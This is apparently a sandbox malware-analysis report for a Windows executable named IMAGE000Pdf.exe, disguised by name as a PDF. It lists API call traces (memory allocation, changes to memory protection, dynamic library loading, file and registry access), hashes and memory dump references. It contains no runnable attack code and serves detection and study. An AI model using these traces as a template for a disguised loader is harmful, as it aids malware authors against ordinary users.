Associated: 00000000.00000002.1803208835.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803530559.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803530559.000000000081E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IMAGE000Pdf.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
Instruction ID: e146fa180a083be72d256ad1b428d57881e9eb39a1326beaade4420b40277b6a
Opcode Fuzzy Hash: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
Instruction Fuzzy Hash: E7E0EC3221065BAFDF10AEA59C04EFB7B6CEB05360F004836FD55E6150D635E9219BA8

Function 00405F96 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,0040340D,000000FF,00793700,?,00793700,?,?,00000004,00000000), ref: 00405FAA

Memory Dump Source

Source File: 00000000.00000002.1803163466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1803147864.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803184970.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803530559.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803530559.000000000081E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IMAGE000Pdf.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
Instruction ID: df8aade711aef2fea4c6cc03ed90c08959c6261ddae8de931081f7d2433cde5f
Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
Instruction Fuzzy Hash: 96E08C3221021AEBDF109E608C00AEB7B6CEB00360F004433FA24E3150D634E8218BA8

Function 700229DF Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(7002505C,00000004,00000040,7002504C), ref: 700229FD

Memory Dump Source

Source File: 00000000.00000002.1837307793.0000000070021000.00000020.00000001.01000000.00000006.sdmp, Offset: 70020000, based on PE: true

Associated: 00000000.00000002.1837286771.0000000070020000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1837323978.0000000070024000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1837342133.0000000070026000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70020000_IMAGE000Pdf.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: e2575b672e8502835320f404f4d93be179f39fe10db0a07c1d1efe123e5e784b
Instruction ID: 84afa4e3adc85ce7e6ad48295d1f59f5a6bda032e6948186daa888b1507e477b
Opcode Fuzzy Hash: e2575b672e8502835320f404f4d93be179f39fe10db0a07c1d1efe123e5e784b
Instruction Fuzzy Hash: FEF092B2500280DEE350CF2A8CC4B093BE0B708737BB0456AE688D6262E3744446CF9D

Function 0040625B Relevance: 1.5, APIs: 1, Instructions: 19registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,007A0F28,?,?,004062E9,007A0F28,00000000,?,?,Call,?), ref: 0040627F

Memory Dump Source

Source File: 00000000.00000002.1803163466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1803147864.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803184970.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803530559.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803530559.000000000081E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IMAGE000Pdf.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: dcd566976f3bef00ddda20b11fb2537fa700d8cbfb920dfffbe2909342267143
Instruction ID: 981b209bfbc59ad728c3152e24748ded8346fc425447e23afb42b8d85bc6dac1
Opcode Fuzzy Hash: dcd566976f3bef00ddda20b11fb2537fa700d8cbfb920dfffbe2909342267143
Instruction Fuzzy Hash: 35D0123200020DBBDF11AF90ED05FAB372DAB08350F014426FE06A4091D775D530A728

Function 00404390 Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004043A2

Memory Dump Source

Source File: 00000000.00000002.1803163466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1803147864.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803184970.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803530559.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803530559.000000000081E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IMAGE000Pdf.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 749224e8f98fb78827d13f0d237c1790e640dc60b1af624d5aad8e7e956e5cea
Instruction ID: 2ab46fc48b107f7ec410a0490fc1e10939948660fe742cc14426a6f165494095
Opcode Fuzzy Hash: 749224e8f98fb78827d13f0d237c1790e640dc60b1af624d5aad8e7e956e5cea
Instruction Fuzzy Hash: 26C04C75784700BADA149B549E45F0677546B90701F158429B641A50D0CA78D410DA2C

Function 0040345A Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(?,00000000,00000000,004031DA,?,?,00000007,00000009,0000000B), ref: 00403468

Memory Dump Source

Source File: 00000000.00000002.1803163466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1803147864.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803184970.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803530559.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803530559.000000000081E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IMAGE000Pdf.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
Instruction ID: 036c8468b6dd2e012b37e6e875261c5f60c7cf4634656b07e897873a541603b6
Opcode Fuzzy Hash: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
Instruction Fuzzy Hash: 1FB01231140304BFDA214F10DF09F067B21BB94700F20C034B384380F086711435EB0D

Function 00404379 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000028,?,00000001,004041A4), ref: 00404387

Memory Dump Source

Source File: 00000000.00000002.1803163466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1803147864.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803184970.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803530559.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803530559.000000000081E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IMAGE000Pdf.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 33429e90f145919918c0f5a16300b6ae2cb664e9c61a266d81822a9c1fb78e21
Instruction ID: 9ccc480ae856a8f761d654a46a9a0801f91457f8e33b58f107ae6609e89c6df3
Opcode Fuzzy Hash: 33429e90f145919918c0f5a16300b6ae2cb664e9c61a266d81822a9c1fb78e21
Instruction Fuzzy Hash: 51B09235181A00AADE914B00DE09F457A62A7A4701F00C029B241240B4CAB200A4DB0A

Function 00404366 Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,0040413D), ref: 00404370

Memory Dump Source

Source File: 00000000.00000002.1803163466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1803147864.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803184970.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803530559.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803530559.000000000081E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IMAGE000Pdf.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: fb2bbd85db119072699d8509dbb0c67ddc0fed6d182cd9e62e167e16add427de
Instruction ID: f32ebe17383345fd09930a0b12515434b8b37a693fa3d318b2a69664ac7713bd
Opcode Fuzzy Hash: fb2bbd85db119072699d8509dbb0c67ddc0fed6d182cd9e62e167e16add427de
Instruction Fuzzy Hash: 97A00176405540AFEE029B61EF09D4ABB72ABA9701B4185B9A286A0034CB364860EB1D

Function 70022AF8 Relevance: 1.4, APIs: 1, Instructions: 143memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000), ref: 70022BB7

Memory Dump Source

Source File: 00000000.00000002.1837307793.0000000070021000.00000020.00000001.01000000.00000006.sdmp, Offset: 70020000, based on PE: true

Associated: 00000000.00000002.1837286771.0000000070020000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1837323978.0000000070024000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1837342133.0000000070026000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70020000_IMAGE000Pdf.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 3a3f7bf9a2a4c4722f3bcbf2e2f630c3adecdb7f388efc6e713eac0a11dded40
Instruction ID: 02f150e1a575d9db8b81cb7095f3e7e388d12d5aab9d51d67d3857643ad5e0c8
Opcode Fuzzy Hash: 3a3f7bf9a2a4c4722f3bcbf2e2f630c3adecdb7f388efc6e713eac0a11dded40
Instruction Fuzzy Hash: 75416D72800204FFEB219FF5EDC6B5D77B9FB44B32F708465E50586522D734A8428B9A

Function 7002121B Relevance: 1.3, APIs: 1, Instructions: 6memoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNELBASE(00000040,?,7002123B,?,700212DF,00000019,700211BE,-000000A0), ref: 70021225

Memory Dump Source

Source File: 00000000.00000002.1837307793.0000000070021000.00000020.00000001.01000000.00000006.sdmp, Offset: 70020000, based on PE: true

Associated: 00000000.00000002.1837286771.0000000070020000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1837323978.0000000070024000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1837342133.0000000070026000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70020000_IMAGE000Pdf.jbxd

Similarity

API ID: AllocGlobal
String ID:
API String ID: 3761449716-0
Opcode ID: 14f484b0151054ed7fae303f75d79d2c5eb23ca98eaa5194539bdee5e8b698ba
Instruction ID: afa57fa94c844b249ad2b2fd52f6b6381ed0b7cce35226c276b379cc95b957c7
Opcode Fuzzy Hash: 14f484b0151054ed7fae303f75d79d2c5eb23ca98eaa5194539bdee5e8b698ba
Instruction Fuzzy Hash: E4B01272A00000DFFE00CB65CC8AF343258E700312F344000FB00C0192C1B048118538

Non-executed Functions

Function 70021B5F Relevance: 20.1, APIs: 13, Instructions: 597stringlibrarymemoryCOMMON

Download Yara Rule

APIs

Part of subcall function 7002121B: GlobalAlloc.KERNELBASE(00000040,?,7002123B,?,700212DF,00000019,700211BE,-000000A0), ref: 70021225

GlobalAlloc.KERNEL32(00000040,00001CA4), ref: 70021C8D
lstrcpyW.KERNEL32(00000008,?), ref: 70021CD5
lstrcpyW.KERNEL32(00000808,?), ref: 70021CDF
GlobalFree.KERNEL32(00000000), ref: 70021CF2
GlobalFree.KERNEL32(?), ref: 70021DD4
GlobalFree.KERNEL32(?), ref: 70021DD9
GlobalFree.KERNEL32(?), ref: 70021DDE
GlobalFree.KERNEL32(00000000), ref: 70021FC8
lstrcpyW.KERNEL32(?,?), ref: 70022182
GetModuleHandleW.KERNEL32(00000008), ref: 70022201
LoadLibraryW.KERNEL32(00000008), ref: 70022212
GetProcAddress.KERNEL32(?,?), ref: 7002226C
lstrlenW.KERNEL32(00000808), ref: 70022286

Memory Dump Source

Source File: 00000000.00000002.1837307793.0000000070021000.00000020.00000001.01000000.00000006.sdmp, Offset: 70020000, based on PE: true

Associated: 00000000.00000002.1837286771.0000000070020000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1837323978.0000000070024000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1837342133.0000000070026000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70020000_IMAGE000Pdf.jbxd

Similarity

API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
String ID:
API String ID: 245916457-0
Opcode ID: 0da3bb0a3a0ed21cc2954f0ed6826c1fa04ab9b2d6ffd46a331b9a382b7a6c9c
Instruction ID: 134c7867384aea5f5625d46a98dc65970c7a034015fdfbbdd5611b4c3fc8062b
Opcode Fuzzy Hash: 0da3bb0a3a0ed21cc2954f0ed6826c1fa04ab9b2d6ffd46a331b9a382b7a6c9c
Instruction Fuzzy Hash: 9022AD71C04205EECB21CFB4ED806EEB7FAFB24B26F20452ED566E6290D7705A81DB50

Function 0040603A Relevance: 24.6, APIs: 10, Strings: 4, Instructions: 130memorystringCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,004061D5,00000000,00000000), ref: 00406075
GetShortPathNameW.KERNEL32(?,007A55E8,00000400), ref: 0040607E

Part of subcall function 00405E49: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040612E,00000000,[Rename],00000000,00000000,00000000), ref: 00405E59
Part of subcall function 00405E49: lstrlenA.KERNEL32(00000000,?,00000000,0040612E,00000000,[Rename],00000000,00000000,00000000), ref: 00405E8B

GetShortPathNameW.KERNEL32(?,007A5DE8,00000400), ref: 0040609B
wsprintfA.USER32 ref: 004060B9
GetFileSize.KERNEL32(00000000,00000000,007A5DE8,C0000000,00000004,007A5DE8,?), ref: 004060F4
GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406103
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 0040613B
SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,007A51E8,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 00406191
GlobalFree.KERNEL32(00000000), ref: 004061A2
CloseHandle.KERNEL32(00000000), ref: 004061A9

Part of subcall function 00405EE4: GetFileAttributesW.KERNELBASE(?,00403055,C:\Users\user\Desktop\IMAGE000Pdf.exe,80000000,00000003,?,00000007,00000009,0000000B), ref: 00405EE8
Part of subcall function 00405EE4: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000007,00000009,0000000B), ref: 00405F0A

Strings

Uz, xrefs: 00406063
[Rename], xrefs: 00406123, 00406135
]z, xrefs: 00406090
%ls=%ls, xrefs: 004060AF

Memory Dump Source

Source File: 00000000.00000002.1803163466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1803147864.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803184970.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803530559.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803530559.000000000081E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IMAGE000Pdf.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
String ID: %ls=%ls$[Rename]$Uz$]z
API String ID: 2171350718-2939442745
Opcode ID: 0ed23fd09f20e9f0b0e4ce5e0ebdd9c0c92abb0a06c9999cd82c312b58dee0fa
Instruction ID: 03fe7b931bffc2b02635af9c10f4e714808f3729e90155368a1b4a6ed52067ca
Opcode Fuzzy Hash: 0ed23fd09f20e9f0b0e4ce5e0ebdd9c0c92abb0a06c9999cd82c312b58dee0fa
Instruction Fuzzy Hash: 44312370600B05BFD6206B618D48F6B3A6CDF86744F15013AFD42FA2C3DA3C99218ABD

Function 0040669D Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON

Download Yara Rule

APIs

CharNextW.USER32(?,*?|<>/":,00000000,00000000,76F93420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\IMAGE000Pdf.exe",0040347D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036EC,?,00000007,00000009,0000000B), ref: 00406700
CharNextW.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 0040670F
CharNextW.USER32(?,00000000,76F93420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\IMAGE000Pdf.exe",0040347D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036EC,?,00000007,00000009,0000000B), ref: 00406714
CharPrevW.USER32(?,?,76F93420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\IMAGE000Pdf.exe",0040347D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036EC,?,00000007,00000009,0000000B), ref: 00406727

Strings

"C:\Users\user\Desktop\IMAGE000Pdf.exe", xrefs: 0040669D
*?|<>/":, xrefs: 004066EF
C:\Users\user\AppData\Local\Temp\, xrefs: 0040669E

Memory Dump Source

Source File: 00000000.00000002.1803163466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1803147864.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803184970.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803530559.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803530559.000000000081E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IMAGE000Pdf.jbxd

Similarity

API ID: Char$Next$Prev
String ID: "C:\Users\user\Desktop\IMAGE000Pdf.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
API String ID: 589700163-2905521784
Opcode ID: 9ddbb9e18cbe24282ce487244f484090ca5dfb24375496ba9be4fccf49263134
Instruction ID: 12c80e2bf748d1a62cb3884e1ae38c2d534281e125f75e63bd15dfe73c9398b2
Opcode Fuzzy Hash: 9ddbb9e18cbe24282ce487244f484090ca5dfb24375496ba9be4fccf49263134
Instruction Fuzzy Hash: E711EB15800A1255DB303B148C84A7763F8EF947A4F56443FED86732C0E77D4C9286BD

Function 004043AB Relevance: 12.1, APIs: 8, Instructions: 68COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EB), ref: 004043C8
GetSysColor.USER32(00000000), ref: 00404406
SetTextColor.GDI32(?,00000000), ref: 00404412
SetBkMode.GDI32(?,?), ref: 0040441E
GetSysColor.USER32(?), ref: 00404431
SetBkColor.GDI32(?,?), ref: 00404441
DeleteObject.GDI32(?), ref: 0040445B
CreateBrushIndirect.GDI32(?), ref: 00404465

Memory Dump Source

